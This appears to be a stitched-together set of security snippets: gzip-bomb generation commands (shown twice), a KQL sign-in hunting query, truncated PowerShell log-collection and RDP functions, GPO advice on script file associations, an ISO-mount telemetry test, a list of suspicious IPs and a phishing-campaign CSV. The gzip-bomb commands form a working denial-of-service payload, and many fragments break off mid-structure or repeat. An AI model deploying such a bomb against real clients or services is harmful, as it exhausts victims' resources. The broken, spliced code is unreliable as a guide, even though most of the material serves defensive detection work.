- Generate the bomb (a 100 MB seed of repeated HTML, then 10 GB of it streamed through `gzip -9`; only the compressed output is written to disk):
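# 10,000,000 x "<p>LOL</p>" (10 bytes each) = 100 MB of highly repetitive HTML.
$ awk 'BEGIN { for (c = 0; c < 10000000; c++) printf "<p>LOL</p>" }' > 100M.html
# Feed the seed 100 times (10 GB) straight into gzip; the uncompressed data
# never touches disk. pv only reports throughput and can be dropped.
# Expect an output of roughly 10 MB — deflate tops out near a 1000:1 ratio — so
# anything that inflates it without a size limit has to find ~10 GB.
$ for _ in {1..100}; do cat 100M.html; done | pv | gzip -9 > 10G.boomgz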
- Check that it really inflates to the expected size (do this on a disposable host: the decompressed stream is 10 GB):
union SigninLogs, AADNonInteractiveUserSignInLogs | |
| where AutonomousSystemNumber in (33438, 25369, 62240, 9009, 60068, 40676, 8100) | |
| summarize | |
min(TimeGenerated), | |
max(TimeGenerated), | |
ResultTypes = make_set(ResultType), | |
IPAddresses = make_set(IPAddress), | |
ASNs = make_set(AutonomousSystemNumber), | |
AppDisplayNames = make_set(AppDisplayName), | |
ClientAppUsed = make_set_if(ClientAppUsed, isnotempty(ClientAppUsed)), |
function Get-RdpLogonEvent | |
{ | |
[CmdletBinding()] | |
param( | |
[Int32] $Last = 10 | |
) | |
$RdpInteractiveLogons = Get-WinEvent -FilterHashtable @{ | |
LogName='Security' | |
ProviderName='Microsoft-Windows-Security-Auditing' |
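# Suppress non-terminating errors so that one unreadable log does not abort the
# rest of the collection. Caveat: this also hides access-denied failures
# (reading Security.evtx or the Sysmon channel typically needs an elevated
# prompt) — inspect $Error afterwards instead of assuming every file was read.
$ErrorActionPreference = "SilentlyContinue"

# Set variables
$DesktopPath = [Environment]::GetFolderPath("Desktop")

# Resolve the live event-log directory from the environment rather than
# hard-coding C:\windows, so the same list works on a non-default system root.
$EvtxDir = Join-Path $env:SystemRoot "System32\winevt\Logs"

# Core channels: Application/System/Security plus the PowerShell, Defender and
# Sysmon operational logs (order preserved from the original list).
$basic = @(
    "Application.evtx",
    "Microsoft-Windows-PowerShell%4Operational.evtx",
    "System.evtx",
    "Microsoft-Windows-Windows Defender%4Operational.evtx",
    "Security.evtx",
    "Microsoft-Windows-Sysmon%4Operational.evtx"
) | ForEach-Object { Join-Path $EvtxDir $_ }

# Channels that record inbound remote access: RDP connection manager and WinRM.
$remote_logs = @(
    "Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx",
    "Microsoft-Windows-WinRM%4Operational.evtx"
) | ForEach-Object { Join-Path $EvtxDir $_ }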
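# 10,000,000 x "<p>LOL</p>" (10 bytes each) = 100 MB of highly repetitive HTML.
$ awk 'BEGIN { for (c = 0; c < 10000000; c++) printf "<p>LOL</p>" }' > 100M.html
# Feed the seed 100 times (10 GB) straight into gzip; the uncompressed data
# never touches disk. pv only reports throughput and can be dropped.
# Expect an output of roughly 10 MB — deflate tops out near a 1000:1 ratio — so
# anything that inflates it without a size limit has to find ~10 GB.
$ for _ in {1..100}; do cat 100M.html; done | pv | gzip -9 > 10G.boomgz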
You can create a GPO that changes the default file association for the following extensions so that double-clicking a file opens it in Notepad as plain text instead of running it as a script. Note that this only affects the shell "open" action (e.g. a user launching a phishing attachment); it does not stop a script from being run by invoking the script host explicitly with the file as an argument.
js
wsh
vbs
wsc
sct
jse
wsf
# Capture a UTC timestamp in XML dateTime form (e.g. 2020-12-01T10:15:30.1234567Z)
# before triggering the action; it is used as the lower bound of an event-log
# XPath filter so that only events produced after this point are returned.
$DateTimeBefore = [Xml.XmlConvert]::ToString([DateTime]::UtcNow, [System.Xml.XmlDateTimeSerializationMode]::Utc)

# Trigger the behaviour whose telemetry we want to observe: mount the ISO from
# the current directory read-only. The command output is discarded; only the
# events it generates matter. NOTE(review): mounting exposes the image's files
# to the host — run this inside an isolated analysis VM if the ISO is untrusted.
$IsoPath = Join-Path $PWD "FeelTheBurn.iso"
Mount-DiskImage -ImagePath $IsoPath -StorageType ISO -Access ReadOnly | Out-Null

# Give the event-log service a moment to flush before querying.
Start-Sleep -Seconds 5
[ | |
[ | |
"NtLockProductActivationKeys", | |
[ | |
"UInt32 *", | |
"UInt32 *" | |
] | |
], | |
[ | |
"NtLockProductActivationKeys", |
178.62.115.135 | |
167.99.197.196 | |
138.68.131.250 | |
195.206.181.141 | |
193.29.13.201 | |
5.61.61.49 | |
139.59.172.170 | |
46.101.63.124 | |
206.189.121.65 | |
46.101.47.102 |
Date,Details,Email Payload Type,Users Targeted | |
12/1/2020,Balance Payment; pdf -> agenttesla,Attachment,2 | |
12/1/2020,All subjects contain DocuSign floydnicholsonsc.com sender; link -> hancitor -> ficker,Link,8257 | |
12/2/2020,All subjects contain DocuSign frankstaropoli.com sender; link -> hancitor -> ficker,Link,4810 | |
12/2/2020,Subjects Invoice <digits>; xlsm|xls -> dridex,Attachment,117 | |
12/2/2020,Re:Re: New Purchase Order-030220- SMART SOURCING INC; link -> agenttesla,Link,5 | |
12/2/2020,Re: Re: Proforma PI-08598; gz -> remcos,Attachment,3 | |
12/3/2020,All subjects contain DocuSign freitasforcongress.com sender; link -> hancitor -> ficker,Link,6047 | |
12/3/2020,BALANCE PAYMENT; z -> agenttesla,Attachment,4 | |
12/3/2020,RE: Payment Advice; z -> agenttesla,Attachment,4 |